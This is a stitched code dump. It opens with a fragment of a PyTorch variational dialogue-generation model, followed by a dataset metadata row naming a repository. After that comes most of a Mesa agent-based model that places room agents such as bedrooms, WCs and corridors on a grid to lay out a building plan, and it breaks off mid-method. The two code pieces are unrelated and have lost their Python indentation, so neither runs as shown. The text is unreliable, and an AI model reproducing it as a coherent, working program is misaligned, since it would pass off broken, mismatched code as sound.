log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv_flat, conv_mu_prior, conv_var_prior).sum()
log_p_z += normal_logpdf(z_ctx_flat, ctx_mu_prior_flat, ctx_var_prior_flat).sum()
log_q_zx = None
# expand z_conv to all associated sentences
#expand z_ctx
# z_ctx = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_ctx_size)
# for z, m in zip(z_ctx, input_conversation_length)])
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size+z_ctx]
latent_context = torch.cat([context_outputs, z_sent, z_conv,z_ctx_flat], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
#decoder_init: [num_layers,batch_size,hidden_size]
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
"""edit here"""
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
## decoder_outputs [batch_size, max_target_len, vocab_size]
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
"""encoder use nn.GRU which need a 3 dimension input context[:, i, :] ? two dimension right? """
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
##encoder_hidden:[batch_size, n_context, hidden_size * direction]
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
#context_hidden = context_init
"""edit here"""
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), n_context, z_conv.size(1))
# context_outputs = []
# z_ctx = []
# ctx_mu_prior = []
# ctx_var_prior = []
# ctx_mu_posterior = []
# ctx_var_posterior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size))) ##edit here
context_init1 = context_init.squeeze(0)
for i_ctx in range(n_context):
if i_ctx==0:
context_cell_input = torch.cat([encoder_hidden[:,i_ctx,:], z_conv_expand[:,i_ctx,:]], 1)
context_h_cell = self.context2context_first(
context_cell_input,
hidden=context_init1)
else:
context_cell_input = torch.cat([encoder_hidden[:,i_ctx,:], z_conv_expand[:,i_ctx,:],z_ctx_cell],1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_h_cell)
#z_ctx_cell: [batch_size,num_directions * context_size]
# ctx_cell_mu_prior,ctx_cell_var_prior = self.ctx_prior(context_h_cell,z_conv_expand[:,i_ctx,:])
ctx_cell_mu_posterior,ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_outputs[:,i_ctx,:],context_h_cell,z_conv_expand[:,i_ctx,:])
z_ctx_cell = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
# z_ctx.append(z_ctx_cell)
# ctx_mu_prior.append(ctx_cell_mu_prior)
# ctx_var_prior.append(ctx_cell_var_prior)
# ctx_mu_posterior.append(ctx_cell_mu_posterior)
# ctx_var_posterior.append(ctx_cell_var_posterior)
# context_outputs.append(context_h_cell)
#context_outputs: [batch_size,n_context,context_size]
#z_ctx:[batch_size,n_context,context_size]
context_outputs = context_h_cell
z_ctx = z_ctx_cell
# ctx_mu_prior = torch.stack(ctx_mu_prior,1)
# ctx_var_prior = torch.stack(ctx_var_prior,1)
# ctx_mu_posterior = torch.stack(ctx_mu_posterior,1)
# ctx_var_posterior = torch.stack(ctx_var_posterior,1)
# z_ctx = torch.stack(z_ctx,1)
"""stop here"""
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv,z_ctx)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv,z_ctx], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
"""edit here"""
context_cell_input = torch.cat([encoder_hidden,z_conv,z_ctx],1)
context_h_cell = self.context2context(
context_cell_input,
hidden = context_outputs)
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor(batch_size)))
ctx_inference_hidden = ctx_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
ctx_cell_mu_posterior,ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_hidden,context_h_cell,z_conv)
z_ctx = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
context_outputs = context_h_cell
"""END EDIT"""
samples = torch.stack(samples, 1)
return samples
| 53.78513 | 187 | 0.560678 | 7,894 | 72,341 | 4.758677 | 0.028756 | 0.054332 | 0.033036 | 0.025715 | 0.950299 | 0.935152 | 0.922375 | 0.91351 | 0.904219 | 0.891548 | 0 | 0.006516 | 0.359367 | 72,341 | 1,344 | 188 | 53.825149 | 0.804052 | 0.148519 | 0 | 0.844244 | 0 | 0 | 0.00028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028217 | false | 0 | 0.007901 | 0.002257 | 0.068849 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ab2da927bbfe458cc90d9ba421237029a908aed0 | 60,917 | py | Python | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | from mesa import Agent, Model
from abm_project.attractor import Attractor
from mesa.time import *
from mesa.space import *
from mesa.datacollection import *
import random
class BuildingModel(Model):
"""
A model representing a building with some number of rooms(agents)
"""
description = ("A model representing a building with some number of different types of rooms (agents)"
+" being attracted to each other based on some set of complicated rules."
+"The result of the model is the best possible plan view of the building according to these rules.")
def __init__(
self,
width=20,
height=20,
N=500,
sl1_rooms=1,
sl_rooms=2,
sl_width=5.14,
sl_height=3.5,
wc1_rooms=1,
wc_rooms=1,
wc_width=4,
wc_height=1.5,
liv_rooms=1,
liv_width=7.77,
liv_height=4.5,
entry_rooms=1,
entry_width=2.66,
entry_height=1.5,
kit_rooms=1,
kit_width=4.5,
kit_height=4,
off_rooms=1,
off_width=3,
off_height=3.33,
corr_rooms=1,
corr_width=1,
corr_height=12,
bath_rooms=1,
bath_width=4,
bath_height=2,
):
# Set parameters
self.N = N
self.sl1_rooms = sl1_rooms
self.sl_rooms = sl_rooms
self.sl_width = sl_width
self.sl_height = sl_height
self.wc1_rooms = wc1_rooms
self.wc_rooms = wc_rooms
self.wc_width = wc_width
self.wc_height = wc_height
self.liv_rooms = liv_rooms
self.liv_width = liv_width
self.liv_height = liv_height
self.entry_rooms = entry_rooms
self.entry_width = entry_width
self.entry_height = entry_height
self.kit_rooms = kit_rooms
self.kit_width = kit_width
self.kit_height = kit_height
self.off_rooms = off_rooms
self.off_width = off_width
self.off_height = off_height
self.corr_rooms = corr_rooms
self.corr_width = corr_width
self.corr_height = corr_height
self.bath_rooms = bath_rooms
self.bath_width = bath_width
self.bath_height = bath_height
self.width = width
self.height = height
self.torus = False
self.reset_const = 1
self.c = 0
self.num_agents = (sl_rooms + wc_rooms
+ sl1_rooms + wc1_rooms
+ liv_rooms + entry_rooms
+ kit_rooms + off_rooms
+ corr_rooms + bath_rooms)
self.agents = []
self.current_id = 0
self.grid = SingleGrid(width, height, self.torus)
self.schedule = SimultaneousActivation(self)
self.stable_pos = 0
self.datacollector = DataCollector(
model_reporters={
"Number of Rooms": lambda x: x.num_agents,
"SL Rooms": lambda x: x.sl_rooms,
"SL1 Rooms": lambda x: x.sl1_rooms,
"WC Rooms": lambda x: x.wc_rooms,
"WC1 Rooms": lambda x: x.wc1_rooms,
},
agent_reporters={
"SL Posistion": lambda x: x.pos,
"SL1 Position": lambda x: x.pos
},
)
self.reset = False
self.make_agents()
self.running = True
self.datacollector.collect(self)
def make_agents(self):
# Create Sleeping Rooms(1)
# Place agents with dimensions
i = 0
while 1:
if i == self.sl1_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.sl_width / 2), self.grid.width - int(self.sl_width / 2), 1)
y = self.random.randrange(int(self.sl_height / 2), self.grid.height - int(self.sl_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.sl_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.sl_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.sl_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.sl_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.sl_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.sl_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms, self.sl_width, self.sl_height)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
i += 1
if len(self.agents) == 0:
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms, self.sl_width, self.sl_height)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
i += 1
# Create Sleeping Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.sl_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.sl_width / 2), self.grid.width - int(self.sl_width / 2), 1)
y = self.random.randrange(int(self.sl_height / 2), self.grid.height - int(self.sl_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.sl_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.sl_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.sl_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.sl_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.sl_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.sl_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms, self.sl_width, self.sl_height)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
i += 1
if len(self.agents) == 0:
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms, self.sl_width, self.sl_height)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
i += 1
# Create WC Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.wc_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.wc_width / 2), self.grid.width - int(self.wc_width / 2), 1)
y = self.random.randrange(int(self.wc_height / 2), self.grid.height - int(self.wc_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.wc_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.wc_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.wc_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.wc_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.wc_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.wc_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms, self.wc_width, self.wc_height)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
i += 1
if len(self.agents) == 0:
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms, self.wc_width, self.wc_height)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
i += 1
# Create WC Rooms(1)
# Place agents with dimensions
i = 0
while 1:
if i == self.wc1_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.wc_width / 2), self.grid.width - int(self.wc_width / 2), 1)
y = self.random.randrange(int(self.wc_height / 2), self.grid.height - int(self.wc_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.wc_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.wc_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.wc_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.wc_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.wc_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.wc_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms, self.wc_width, self.wc_height)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
i += 1
if len(self.agents) == 0:
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms, self.wc_width, self.wc_height)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
i += 1
# Create Living Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.liv_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.liv_width / 2), self.grid.width - int(self.liv_width / 2), 1)
y = self.random.randrange(int(self.liv_height / 2), self.grid.height - int(self.liv_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.liv_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.liv_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.liv_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.liv_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.liv_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.liv_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms, self.liv_width, self.liv_height)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
i += 1
if len(self.agents) == 0:
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms, self.liv_width, self.liv_height)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
i += 1
# Create Entries
# Place agents with dimensions
i = 0
while 1:
if i == self.entry_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.entry_width / 2), self.grid.width - int(self.entry_width / 2), 1)
y = self.random.randrange(int(self.entry_height / 2), self.grid.height - int(self.entry_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.entry_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.entry_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.entry_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.entry_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.entry_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.entry_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
entryroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms, self.entry_width, self.entry_height)
self.agents.append(entryroom)
self.schedule.add(entryroom)
self.grid.place_agent(entryroom, pos)
i += 1
if len(self.agents) == 0:
entryroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms, self.entry_width, self.entry_height)
self.agents.append(entryroom)
self.schedule.add(entryroom)
self.grid.place_agent(entryroom, pos)
i += 1
# Create Kitchens
# Place agents with dimensions
i = 0
while 1:
if i == self.kit_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.kit_width / 2), self.grid.width - int(self.kit_width / 2), 1)
y = self.random.randrange(int(self.kit_height / 2), self.grid.height - int(self.kit_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.kit_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.kit_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.kit_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.kit_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.kit_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.kit_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms, self.kit_width, self.kit_height)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
i += 1
if len(self.agents) == 0:
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms, self.kit_width, self.kit_height)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
i += 1
# Create Office Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.off_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.off_width / 2), self.grid.width - int(self.off_width / 2), 1)
y = self.random.randrange(int(self.off_height / 2), self.grid.height - int(self.off_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.off_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.off_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.off_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.off_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.off_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.off_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms, self.off_width, self.off_height)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
i += 1
if len(self.agents) == 0:
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms, self.off_width, self.off_height)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
i += 1
# Create Corridors
# Place agents with dimensions
i = 0
while 1:
if i == self.corr_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.corr_width / 2), self.grid.width - int(self.corr_width / 2), 1)
y = self.random.randrange(int(self.corr_height / 2), self.grid.height - int(self.corr_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.corr_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.corr_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.corr_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.corr_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.corr_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.corr_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms, self.corr_width, self.corr_height)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
i += 1
if len(self.agents) == 0:
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms, self.corr_width, self.corr_height)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
i += 1
# Create Baths
# Place agents with dimensions
i = 0
while 1:
if i == self.bath_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.bath_width / 2), self.grid.width - int(self.bath_width / 2), 1)
y = self.random.randrange(int(self.bath_height / 2), self.grid.height - int(self.bath_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.bath_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.bath_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.bath_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.bath_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.bath_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.bath_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms, self.bath_width, self.bath_height)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
i += 1
if len(self.agents) == 0:
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms, self.bath_width, self.bath_height)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
i += 1
def step(self):
"""
Run one step of the model. If All agents are stable, halt the model.
"""
# Reset counter of stable_pos
self.stable_pos = 0
# tell all the agents in the model to run their step function
self.schedule.step()
# collect data
self.datacollector.collect(self)
print("--stable_pos : ", self.stable_pos)
# stabilize the model if counter reaches the total number of agents
if self.stable_pos == self.schedule.get_agent_count():
self.running = False
# each N steps reset model if it is not yet stabilized
if self.schedule.steps / self.N == self.reset_const:
print(self.schedule.steps)
self.reset = True
class SL1RoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore=True, sl1_rooms=1, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.sl1_rooms = sl1_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_sl1 = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.sl1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.sl1_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_sl1 = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is WCRoomAgent:
# self.stable_sl1 += 1
# if type(i) is CorrRoomAgent:
# self.stable_sl1 += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_sl1 == 2:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class SLRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore=True, sl_rooms=2, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.sl_rooms = sl_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_sl = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.sl_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.sl_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_sl = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is CorrRoomAgent:
# self.stable_sl += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
